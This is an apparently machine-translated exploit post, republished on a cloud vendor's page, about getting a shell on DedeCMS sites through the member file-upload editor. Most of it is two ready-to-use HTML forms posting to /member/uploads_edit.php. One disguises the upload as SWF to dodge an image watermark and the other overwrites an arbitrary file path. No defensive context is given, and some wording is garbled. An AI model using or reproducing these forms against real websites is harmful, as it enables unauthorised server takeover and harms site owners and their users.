Alternative submission methods for the dede getshell Vulnerability

Source: Internet
Author: User

A dede station. The latest version is added with an evil watermark when uploading images. After being added with a watermark, this PP will be discarded.
Solution:
1. Modify the suffix to SWF format and change mediatype ID to 2 (1 seems to be the image format, 2 is the SWF format
<Form action = "/member/uploads_edit.php" method = "post" enctype = "multipart/form-data" ">
<Input type = "hidden" name = "aid" value = "7"/>
<Input type = "hidden" name = "mediatype" value = "2"/>
<Input type = "text" name = "oldurl" value = "/uploads/userup/3/1.swf"/> </br>
<Input type = "hidden" name = "dopost" value = "save"/>
<Input name = "title" type = "hidden" id = "title" value = "1.swf" class =" intxt "/>
<Input name = "addonfile" type = "file" id = "addonfile"/>
<Button class = "button2" type = "submit"> change </button>
</Form>
The subsequent steps are the same as the previous ones.
2. for a simpler form, update the space LOGO when uploads_edit.php is deleted.
<Form action = "http://doc.xxxx.com/member/uploads_edit.php" method = "post" enctype = "multipart/form-data">
<Input type = "text" name = "oldurl" value = "z"/> </br>
<Input type = "hidden" name = "dopost" value = "save"/>
<Input name = "addonfile" type = "file"/>
<Input type = "submit" name = "submit" value = "Submit"/>
</Form>

 


Address: html> http://www.t00ls.net/thread-13663-1-1.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.